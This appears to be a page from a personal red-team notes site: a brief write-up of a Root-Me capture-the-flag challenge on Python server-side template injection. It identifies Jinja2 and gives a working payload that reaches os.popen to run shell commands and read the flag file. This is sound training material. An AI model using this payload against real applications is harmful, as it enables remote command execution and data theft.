Skip to content
logo
Red team
Python: Server-side Template Injection Introduction
  • Green team
  • Blue team
  • Purple team
  • Ty Myrddin
Initializing search
      • IN: Where the falcons and foxes roam
        • Swoop like falcons, silent, precise, and lethally patient
        • Mapping the lay of the land
        • Fox hunting through the digital wilds
        • A canopy of apple-blossom
          • Field notes from the fragrant branches of web app exploitation
          • Portswigger Academy labs: Controlled burn
          • Root-me: Orchard foraging
            • Root-Me Web client challenges
            • Root-Me Web server challenges
              • Insecure code management
              • Directory traversal
              • File upload: null byte
              • PHP assert()
              • PHP Filters
              • PHP Register globals
              • JWT Introduction
              • JWT (not) revoked token
              • JWT weak secret
              • Python: Server-side Template Injection Introduction
                • Resources
              • Command injection: filter bypass
              • Java: Server-side Template Injection (SSTI)
              • Local file inclusion
              • Local file inclusion: double encoding
              • PHP preg_replace
              • PHP type juggling
              • SQL injection: authentication
              • SQL injection: string
              • XSLT code execution
              • PHP path truncation
              • PHP serialisation
              • SQL injection: numeric
              • SQL injection: routed
              • SQL truncation
              • XPath injection: authentication
              • SQL injection: time-based
          • Petals and pentesting priorities
        • Getting a foothold in the top of the world tree
        • Hack the planet? Nah, just hold the door for me
        • Where wild boars plough through endpoints
        • Wolverines do not ask for permissions
        • Riches in the ground
      • THROUGH: Where the raccoons burrow and rummage
      • OUT: Where squirrels swipe the crown jewels
    • Resources

    Python: Server-side Template Injection Introduction¶

    root-me challenge: Python - Server-side Template Injection Introduction: This service allows you to generate a web page. Use it to read the flag!

    ${ ... } didn’t work, but {{ ... }} did. Further fiddling. Apparently Jinja2.

    Use {{ self._TemplateReference__context.joiner.__init__.__globals__.os.popen('id').read() }} to cat .passwd.

    Resources¶

    • PayloadAllTheThings: Exploit the SSTI by calling os.popen().read()

    Last update: 2025-05-12 14:16
    Back to top
    Previous JWT weak secret
    Next Command injection: filter bypass
    © Copyright 2025, TyMyrddin.
    Created using Sphinx 7.2.6. and Sphinx-Immaterial

    Made with love in the Unseen University, 2025, with a forest garden fostered by /ut7